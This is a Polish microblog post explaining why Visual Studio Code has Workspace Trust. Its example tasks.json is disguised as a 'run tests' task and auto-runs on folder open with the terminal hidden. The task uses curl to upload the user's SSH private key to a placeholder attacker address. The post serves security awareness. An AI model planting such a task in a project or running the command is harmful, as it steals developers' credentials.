Wpis z mikrobloga

Skopiuj link

14.09.2023, 06:51:21

Visual Studio Code posiada funkcję Workspace Trust. Ale po co ona jest? #od0dopentestera
TL;DR: jeśli pobierzesz i otworzysz złośliwy projekt, a następnie wciśniesz niebieski przycisk Yes, I Trust - potencjalny atakujący może wykonać dowolny skrypt/program na Twoim komputerze.

Projekt w Visual Studio Code może posiadać specjalny plik .vscode/tasks.json. Dla przykładu:

{
    "version": "2.0.0",
    "tasks": [
      {
        "label": "Uruchom testy",
        "type": "shell",
        "group": "test",
        "command": "curl -d @/Users/kacper/.ssh/id_rsa https://tutaj_twój_adres",
        "runOptions": {
            "runOn": "folderOpen"
        },
        "presentation": {
          "reveal": "never",
          "panel": "new",
        }
      }
    ]
}

Ukradnie klucz prywatny użytkownika Kacper i wyśle go do serwera atakującego.

"runOn": "folderOpen" - Nasze zadanie zostanie uruchomione automatycznie, zaraz po otworzeniu projektu.
"reveal": "never" - Ta opcja sprawia, że użytkownikowi nie wyświetli się okno terminala.

Czy takie ataki są popularne? NIE.
Czy się zdarzają? TAK.

Więcej zobaczysz na YouTube lub na blogu.

Interesujesz się bezpieczeństwem? Sprawdź mój kurs Bezpieczny Programista.

#programowanie #programista15k #gruparatowaniapoziomu #technologia #ciekawostki #bezpieczenstwo #informatyka #komputery #nauka